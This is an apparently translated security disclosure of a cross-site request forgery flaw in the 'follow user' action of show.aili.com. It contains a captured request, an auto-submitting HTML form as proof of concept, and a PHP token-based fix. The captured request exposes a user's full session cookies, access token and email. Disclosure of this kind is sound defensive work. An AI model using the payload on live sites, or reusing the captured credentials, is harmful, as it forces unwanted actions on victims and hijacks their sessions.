2013-10-25: Details have been sent to the vendor and are awaiting vendor handling
2013-10-25: Vendor has confirmed; details are disclosed to the vendor only
2013-11-04: Details disclosed to core white hats and experts in related fields
2013-11-14: Details disclosed to regular white hats
2013-11-24: Details disclosed to intern white hats
2013-12-09: Details disclosed to the public

http://show.aili.com/index.php?m=content&c=goods&a=goodsShow&gid=5071273 : unlimited comments

Captured packet for the arbitrary-follow CSRF:
POST /index.php?m=content&c=goods&a=addAttention HTTP/1.1
Host: show.aili.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://show.aili.com/index.php?m=content&c=goods&a=myhome&uid=1
Content-Length: 10
Cookie: BAIDU_CLB_REFER=http%3A%2F%2Fwww.baidu.com%2Fs%3Fword%3Dailiwang%26tn%3D82013038_103_hao_pg%26ie%3Dutf-8; Hm_lvt_7042ea0b321a91ea599a6d16b48f9a6b=1379719929; Hm_lpvt_7042ea0b321a91ea599a6d16b48f9a6b=1379728848; mid=523cd976ad8b7; __utma=1.1351935822.1379727729.1379727729.1379727729.1; __utmc=1; __utmz=1.1379727729.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); auth=6a59cuoNNYMcu3DnYUrRqaGQduA5sSuqNRKdzHlrCbT0P4RPDhiBR9dyxV7jm7dzay8UvkYgQx9cPdauYeLErnvbIO%2BUe4%2FjBX52ru7%2FIDz95EDm7xKqQQSrFzj6Eh6LdRj0x1yzti69FpWWGgFjl0Sk%2Blg3WJsfQduSpGqlkddQMCk; username=%26%2350%3B%26%2353%3B%26%2355%3B%26%2352%3B%26%2352%3B%26%2353%3B%26%2353%3B%26%2357%3B%26%2353%3B%26%2357%3B; asffd=2574455959; uid=1061171; avatar=http%3A%2F%2Fspace.aili.com%2Fuc_server%2Favatar.php%3Fuid%3D1061171%26size%3Dmiddle%26r%3D81384; integration=0; reportnum=0; report=0; 1061171email=2574455959%40qq.com; 1061171storearcnum=0; 1061171storepicnum=0; history=22648%2C22647%2C22643%2C23595%2C23593; __utmb=1.24.10.1379727729; lzstat_uv=11399191941278091788|2769764; lzstat_ss=2861658854_2_1379752035_2769764; CNZZDATA30020763=cnzz_eid%3D411560464-1379719844-http%253A%252F%252Fshow.aili.com%26ntime%3D1379725249%26cnzz_a%3D54%26retime%3D1379728847484%26sin%3Dnone%26ltime%3D1379728847484%26rtime%3D0; CNZZDATA30059587=cnzz_eid%3D1936712058-1379724330-http%253A%252F%252Fshow.aili.com%26ntime%3D1379724330%26cnzz_a%3D54%26retime%3D1379728847492%26sin%3Dnone%26ltime%3D1379728847492%26rtime%3D0; timestamp=1379728339000; sign=5A51DA1B4CFFB18EFB6359A40696A9C5; PHPSESSID=78e1e595675282700f619b886eadb47f; bArEe__realname=4f74AwkGAglSBgQEVFIBCgBQBQFQBwdeCgZaDgmEg5yE0urVpLg; weibojs_3917973109=access_token%3D2.00eWNuJEfm6JRE135af771150juxvz%26remind_in%3D666250%26expires_in%3D666250%26uid%3D3810916716; bArEe_auth=704bBFFRBQAJAAkDBFVXAFcGXAVcVghSCwFXXAFSAwQHcApiMjRZem5xVWp%2BZlQhKnU0W3N2cCthMENAWiRyUyBwCnEgNmN2a3NOahs; bArEe__userid=704bBFFRBQAJAAkDBFdSBlMBVVoOAAZWVlVWDQBdCwRRC1Q; bArEe__username=704bBFFRBQAJAAkDBFFSU1YAAAcKBFJTUl0DWw4UAghcClUDWFgH; bArEe____uname=%26%23113%3B%26%2349%3B%26%2356%3B%26%2357%3B%26%2356%3B%26%2351%3B%26%2355%3B%26%2357%3B%26%2357%3B%26%2350%3B
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

touserid=1
Constructed PoC:

<html>
<body>
<form id="csrf" name="csrf" action="http://show.aili.com/index.php?m=content&c=goods&a=addAttention" method="POST">
<input type="text" name="touserid" value="1" />
<input type="submit" value="submit">
</form>
<script> document.csrf.submit();</script>
</body>
</html>

1: Check the WooYun knowledge base
2: Add a captcha
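The captured request shows the follow action is authorised by the session cookie alone, so any page the victim visits can submit the form above on their behalf. The standard server-side fix, and the usual alternative to the captcha suggested here, is a synchronizer token bound to the session plus an Origin/Referer check. The handler below is an added example written for this report, not the vendor's code; it assumes a PHP 7 session with the logged-in user id in $_SESSION['uid'], and persist_follow() is a hypothetical placeholder for the real "add attention" write.

```php
<?php
// Added example (not the vendor's code): synchronizer-token CSRF protection for a
// "follow user" endpoint such as index.php?m=content&c=goods&a=addAttention.
// Assumptions (hypothetical): PHP >= 7.0 sessions, logged-in user id in
// $_SESSION['uid'], persist_follow() stands in for the real DB write.
declare(strict_types=1);

const EXPECTED_HOST = 'show.aili.com';

/** Return the per-session CSRF token, creating one on first use (32 random bytes, hex). */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Constant-time check of the submitted token against the session token. */
function csrf_token_valid($submitted): bool
{
    if (!is_string($submitted) || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

/**
 * Second layer: the Origin header (Referer as fallback) must name our own host.
 * Browsers add Origin to cross-site POSTs and a third-party page cannot forge it.
 * A missing header fails closed; relax only if known clients strip it.
 */
function origin_allowed(array $server): bool
{
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = parse_url($source, PHP_URL_HOST);   // null for '', 'null' or junk
    return is_string($host) && strcasecmp($host, EXPECTED_HOST) === 0;
}

/** Hypothetical placeholder for the real "add attention" persistence step. */
function persist_follow(int $uid, int $touserid): void
{
}

/** Handle a=addAttention; returns the HTTP status code to send. */
function handle_add_attention(array $post, array $server): int
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return 405;
    }
    // The PoC form carries neither the token nor a matching Origin, so it stops here.
    if (!origin_allowed($server) || !csrf_token_valid($post['csrf_token'] ?? null)) {
        return 403;
    }
    $touserid = filter_var($post['touserid'] ?? '', FILTER_VALIDATE_INT,
                           ['options' => ['min_range' => 1]]);
    if ($touserid === false || empty($_SESSION['uid'])) {
        return 400;
    }
    persist_follow((int) $_SESSION['uid'], $touserid);
    return 200;
}

session_start();
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    http_response_code(handle_add_attention($_POST, $_SERVER));
    exit;
}
// GET: render the button with the token embedded. The site's existing XMLHttpRequest
// caller only needs to send the same csrf_token field alongside touserid.
?>
<form method="post" action="/index.php?m=content&c=goods&a=addAttention">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <input type="hidden" name="touserid" value="1">
  <button type="submit">Follow</button>
</form>
```

The token check is the primary control; the Origin/Referer check is defence in depth and should not be the only one, since some clients omit both headers. On PHP 7.3 or later, calling session_set_cookie_params(['samesite' => 'Lax']) before session_start() adds a third layer by stopping the browser from attaching the session cookie to a cross-site POST at all.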
Severity: Medium
Vulnerability Rank: 9
Confirmation time: 2013-10-25 11:09
Thanks to the white hat; this hole will definitely be patched. The programmers need to work harder, and if they still don't, they are going to get spanked.
None